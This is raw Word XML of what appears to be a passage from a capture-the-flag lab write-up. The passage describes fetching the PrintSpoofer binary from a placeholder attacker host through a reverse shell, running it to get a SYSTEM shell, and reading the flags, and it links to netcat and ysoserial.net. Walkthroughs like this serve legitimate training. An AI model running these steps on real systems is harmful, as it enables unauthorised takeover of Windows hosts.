            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PrintSpoofer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, binary was used — a tool designed to exploit token impersonation flaws in Windows print services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PrintSpoofer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leverages the available privilege to capture and impersonate a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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> process token, allowing execution of arbitrary commands with maximum privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PrintSpoofer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary was downloaded to the target machine using the active reverse shell.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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9">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&lt;ip-vpn&gt;/PrintSpoofer64.exe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PrintSpoofer64.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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60500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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43600" cy="1460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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrintSpoofer </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary present on the machine, it was executed directly from the reverse shell. The execution spawned a new process with elevated privileges, allowing a shell as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thereby gaining full administrative control over the compromised Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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E">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PrintSpoofer64.exe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cmd.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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41400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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1041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root flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user directory, accessible after obtaining </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>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8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16100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="66"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1816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user flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was located in the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\mssql-svc\Desktop.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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30500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="67"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2730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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>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2025 Hacking Club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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.uahhc9dq855i"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50" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20.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8D">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8E">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2"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15679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="48"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Montagne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15679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="48"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6686550" cy="3015679"/>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1"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hyperlink" Target="https://github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="External"/><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github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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hyperlink" Target="https://app.hackingclub.com/training/training-machines/289#"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header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.net" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/int0x33/nc.exe/blob/master/nc64.ex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 Id="rId2"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i9Rwtk9kPPdJtSOy5J2TIGnABw==">CgMxLjAyDmgub2R5ZXRhcXVkYmprMg5oLjdtbXZwNWR4cm9wczINaC42c3h3aW16Nnl1NzIOaC5uOXIxdzdocXRlNXAyDmguZmlqajI5c2Y0cndiMg5oLnVhaGhjOWRxODU1aTgAciExS1NxS2I3NFJnUDZEVmxlcnktVlRJTDhNSFFLcXpVVnI=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